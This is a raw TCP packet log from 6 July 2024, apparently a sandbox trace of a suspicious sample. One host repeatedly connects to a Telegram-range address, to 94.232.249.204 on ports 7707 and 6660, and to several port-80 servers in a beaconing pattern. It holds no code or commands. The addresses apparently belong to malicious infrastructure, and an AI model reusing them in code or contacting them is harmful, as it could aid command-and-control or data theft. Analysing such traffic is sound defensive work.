Jul 6, 2024 13:28:49.099246979 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:49.099256992 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:49.099282980 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:49.099293947 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:49.099421024 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:49.099431992 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:49.099447012 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:49.099452972 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:49.099495888 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:49.099502087 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:49.128237009 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:49.170608044 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:49.175479889 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:49.175539970 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:49.180423975 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:49.330326080 CEST	80	49906	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:49.330746889 CEST	80	49906	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:49.330805063 CEST	49906	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:49.334350109 CEST	49906	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:49.440716982 CEST	49907	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:49.445687056 CEST	80	49907	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:49.445755005 CEST	49907	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:49.445791960 CEST	49907	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:49.450654030 CEST	80	49907	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:49.450706005 CEST	49907	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:49.455586910 CEST	80	49907	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:49.551558018 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:49.551645041 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:49.551790953 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:49.552290916 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:50.198432922 CEST	80	49907	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:50.198447943 CEST	80	49907	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:50.198512077 CEST	49907	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:50.202306986 CEST	49907	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:50.316098928 CEST	49908	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:50.320988894 CEST	80	49908	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:50.321067095 CEST	49908	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:50.321115017 CEST	49908	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:50.325936079 CEST	80	49908	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:50.325982094 CEST	49908	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:50.330739975 CEST	80	49908	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:51.072787046 CEST	80	49908	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:51.073812008 CEST	80	49908	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:51.073890924 CEST	49908	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:51.094774961 CEST	49908	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:51.206315994 CEST	49909	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:51.211225986 CEST	80	49909	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:51.211306095 CEST	49909	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:51.211390972 CEST	49909	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:51.216165066 CEST	80	49909	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:51.216211081 CEST	49909	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:51.221046925 CEST	80	49909	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:51.973701954 CEST	80	49909	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:51.974154949 CEST	80	49909	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:51.974261045 CEST	49909	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:51.978667021 CEST	49909	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:52.015580893 CEST	49897	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:52.015968084 CEST	49910	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:52.022579908 CEST	6660	49897	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:52.022595882 CEST	6660	49910	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:52.022663116 CEST	49910	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:52.022988081 CEST	49910	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:52.027893066 CEST	6660	49910	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:52.081379890 CEST	49911	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:52.086380005 CEST	80	49911	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:52.086432934 CEST	49911	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:52.086477041 CEST	49911	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:52.091985941 CEST	80	49911	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:52.092047930 CEST	49911	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:52.097362041 CEST	80	49911	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:52.810226917 CEST	80	49911	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:52.810853958 CEST	80	49911	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:52.810935974 CEST	49911	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:52.814743996 CEST	49911	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:52.925075054 CEST	49912	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:52.930064917 CEST	80	49912	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:52.930223942 CEST	49912	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:52.930267096 CEST	49912	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:52.935179949 CEST	80	49912	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:52.936156988 CEST	49912	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:52.941355944 CEST	80	49912	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:53.656074047 CEST	6660	49910	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:53.656147957 CEST	49910	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:53.770708084 CEST	80	49912	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:53.771107912 CEST	80	49912	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:53.771173000 CEST	49912	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:53.776756048 CEST	49912	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:53.878443956 CEST	49913	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:53.883385897 CEST	80	49913	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:53.883450031 CEST	49913	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:53.883497000 CEST	49913	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:53.888286114 CEST	80	49913	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:53.888343096 CEST	49913	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:53.893156052 CEST	80	49913	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:54.615864038 CEST	80	49913	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:54.616656065 CEST	80	49913	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:54.616699934 CEST	49913	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:54.620747089 CEST	49913	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:54.722261906 CEST	49915	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:54.727194071 CEST	80	49915	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:54.727335930 CEST	49915	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:54.727535009 CEST	49915	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:54.732321024 CEST	80	49915	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:54.732469082 CEST	49915	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:54.737381935 CEST	80	49915	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:55.450159073 CEST	80	49915	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:55.450177908 CEST	80	49915	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:55.453815937 CEST	49915	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:55.473834991 CEST	49915	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:55.582026958 CEST	49916	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:55.587801933 CEST	80	49916	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:55.587907076 CEST	49916	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:55.591739893 CEST	49916	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:55.596585989 CEST	80	49916	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:55.596731901 CEST	49916	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:55.601556063 CEST	80	49916	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:56.193624020 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:56.252588034 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:56.331449032 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:56.340181112 CEST	80	49916	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:56.340306044 CEST	80	49916	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:56.340368032 CEST	49916	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:56.344012976 CEST	49916	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:56.380650043 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:56.456284046 CEST	49917	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:56.461702108 CEST	80	49917	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:56.461781979 CEST	49917	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:56.461822987 CEST	49917	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:56.466770887 CEST	80	49917	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:56.466818094 CEST	49917	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:56.471662045 CEST	80	49917	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:57.185849905 CEST	80	49917	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:57.186712980 CEST	80	49917	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:57.186758995 CEST	49917	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:57.188843012 CEST	49917	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:57.300014019 CEST	49918	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:57.308953047 CEST	80	49918	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:57.309067011 CEST	49918	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:57.309123039 CEST	49918	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:57.318773985 CEST	80	49918	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:57.318816900 CEST	49918	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:57.323812962 CEST	80	49918	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:57.656095028 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:57.662972927 CEST	80	49731	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:57.663032055 CEST	49731	80	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:58.053399086 CEST	80	49918	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:58.054510117 CEST	80	49918	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:58.057977915 CEST	49918	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:58.072365046 CEST	49918	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:58.175024033 CEST	49919	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:58.179872036 CEST	80	49919	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:58.179945946 CEST	49919	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:58.182972908 CEST	49919	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:58.187757969 CEST	80	49919	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:58.188524008 CEST	49919	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:58.193445921 CEST	80	49919	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:58.682248116 CEST	49910	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:58.682562113 CEST	49920	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:58.689259052 CEST	6660	49910	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:58.689850092 CEST	6660	49920	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:58.689917088 CEST	49920	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:58.690402031 CEST	49920	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:58.697365046 CEST	6660	49920	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:58.874351025 CEST	80	49919	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:58.874602079 CEST	80	49919	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:58.874649048 CEST	49919	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:58.877960920 CEST	49919	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:58.987605095 CEST	49921	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:58.992557049 CEST	80	49921	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:58.992616892 CEST	49921	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:58.992696047 CEST	49921	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:58.997442961 CEST	80	49921	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:58.997484922 CEST	49921	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:59.002274036 CEST	80	49921	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:59.805322886 CEST	80	49921	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:59.805497885 CEST	80	49921	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:59.805655003 CEST	49921	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:59.809093952 CEST	49921	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:59.928060055 CEST	49922	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:59.933006048 CEST	80	49922	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:59.933104992 CEST	49922	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:59.933231115 CEST	49922	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:59.938025951 CEST	80	49922	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:59.938119888 CEST	49922	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:59.942926884 CEST	80	49922	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:00.327136993 CEST	6660	49920	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:00.327214003 CEST	49920	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:00.450254917 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:00.455310106 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:00.455578089 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:00.460443020 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:00.650013924 CEST	80	49922	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:00.653357983 CEST	80	49922	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:00.653428078 CEST	49922	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:00.658185959 CEST	49922	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:00.769184113 CEST	49923	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:00.774107933 CEST	80	49923	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:00.774174929 CEST	49923	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:00.774224997 CEST	49923	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:00.779072046 CEST	80	49923	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:00.779117107 CEST	49923	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:00.783977032 CEST	80	49923	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:00.784224987 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:00.926456928 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:00.926512003 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:01.011379957 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:01.016191006 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:01.016241074 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:01.021007061 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:01.501929045 CEST	80	49923	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:01.502273083 CEST	80	49923	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:01.502321005 CEST	49923	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:01.506844044 CEST	49923	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:01.612829924 CEST	49925	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:01.617707968 CEST	80	49925	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:01.617773056 CEST	49925	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:01.617854118 CEST	49925	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:01.622631073 CEST	80	49925	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:01.622714043 CEST	49925	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:01.629142046 CEST	80	49925	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:01.962925911 CEST	49926	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:01.962956905 CEST	443	49926	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:01.963061094 CEST	49926	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:01.963352919 CEST	49926	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:01.963363886 CEST	443	49926	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:02.306035042 CEST	80	49925	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:02.308648109 CEST	80	49925	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:02.308846951 CEST	49925	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:02.309221029 CEST	49925	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:02.425643921 CEST	49927	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:02.430823088 CEST	80	49927	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:02.431241035 CEST	49927	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:02.431241035 CEST	49927	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:02.436131001 CEST	80	49927	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:02.436265945 CEST	49927	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:02.441086054 CEST	80	49927	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:02.474972963 CEST	443	49926	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:02.475066900 CEST	49926	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:02.476505995 CEST	49926	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:02.476512909 CEST	443	49926	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:02.476874113 CEST	443	49926	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:02.479063034 CEST	49926	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:02.520515919 CEST	443	49926	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:02.607285023 CEST	443	49926	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:02.607331038 CEST	443	49926	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:02.609945059 CEST	49926	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:02.610946894 CEST	49926	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:02.618398905 CEST	49928	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:02.623318911 CEST	80	49928	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:02.623389006 CEST	49928	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:02.623472929 CEST	49928	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:02.628371000 CEST	80	49928	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:03.094541073 CEST	80	49928	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:03.133712053 CEST	80	49927	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:03.134175062 CEST	80	49927	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:03.134224892 CEST	49927	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:03.135804892 CEST	49927	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:03.174469948 CEST	49928	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:03.237441063 CEST	49929	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:03.242532969 CEST	80	49929	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:03.242595911 CEST	49929	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:03.242660999 CEST	49929	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:03.249264002 CEST	80	49929	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:03.249310017 CEST	49929	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:03.255361080 CEST	80	49929	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:03.294513941 CEST	49928	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:03.296478033 CEST	49930	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:03.300143003 CEST	80	49928	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:03.300194979 CEST	49928	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:03.301508904 CEST	80	49930	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:03.301609039 CEST	49930	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:03.301712036 CEST	49930	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:03.306559086 CEST	80	49930	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:03.764298916 CEST	80	49930	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:03.927062988 CEST	49930	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:03.934247017 CEST	80	49930	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:03.934437990 CEST	49930	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:03.944036961 CEST	49931	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:03.944070101 CEST	443	49931	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:03.944335938 CEST	49931	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:03.945097923 CEST	49931	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:03.945110083 CEST	443	49931	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:04.406649113 CEST	443	49931	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:04.410248995 CEST	49931	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:04.410264969 CEST	443	49931	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:04.418967962 CEST	80	49929	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:04.419195890 CEST	80	49929	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:04.419358015 CEST	49929	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:04.421288013 CEST	49929	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:04.532864094 CEST	443	49931	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:04.532974958 CEST	443	49931	104.26.13.205	192.168.2.4
Jul 6, 2024 13:29:04.533878088 CEST	49931	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:04.534153938 CEST	49931	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:29:04.537842989 CEST	49932	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:04.543520927 CEST	80	49932	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:04.543667078 CEST	49932	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:04.543667078 CEST	49932	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:04.548638105 CEST	80	49932	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:04.548959017 CEST	49932	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:04.554032087 CEST	80	49932	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:04.597589016 CEST	49933	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:04.602463961 CEST	80	49933	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:04.606249094 CEST	49933	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:04.606386900 CEST	49933	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:04.611123085 CEST	80	49933	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:05.106760025 CEST	80	49933	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:05.174469948 CEST	49933	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:05.346447945 CEST	49920	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:05.346688986 CEST	49934	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:05.352461100 CEST	6660	49920	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:05.352473974 CEST	6660	49934	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:05.352555037 CEST	49934	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:05.352838993 CEST	49934	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:29:05.357652903 CEST	6660	49934	94.232.249.204	192.168.2.4
Jul 6, 2024 13:29:05.581022024 CEST	49933	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:05.581640959 CEST	49935	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:05.586292028 CEST	80	49933	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:05.586339951 CEST	49933	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:05.586421967 CEST	80	49935	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:05.586487055 CEST	49935	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:05.586594105 CEST	49935	80	192.168.2.4	208.95.112.1
Jul 6, 2024 13:29:05.591382027 CEST	80	49935	208.95.112.1	192.168.2.4
Jul 6, 2024 13:29:05.788850069 CEST	80	49932	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:05.789813995 CEST	80	49932	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:05.789993048 CEST	49932	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:05.791152954 CEST	49932	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:05.893771887 CEST	49936	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:05.899725914 CEST	80	49936	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:05.900229931 CEST	49936	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:05.900229931 CEST	49936	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:29:05.905937910 CEST	80	49936	188.114.96.3	192.168.2.4
Jul 6, 2024 13:29:05.906161070 CEST	49936	80	192.168.2.4	188.114.96.3
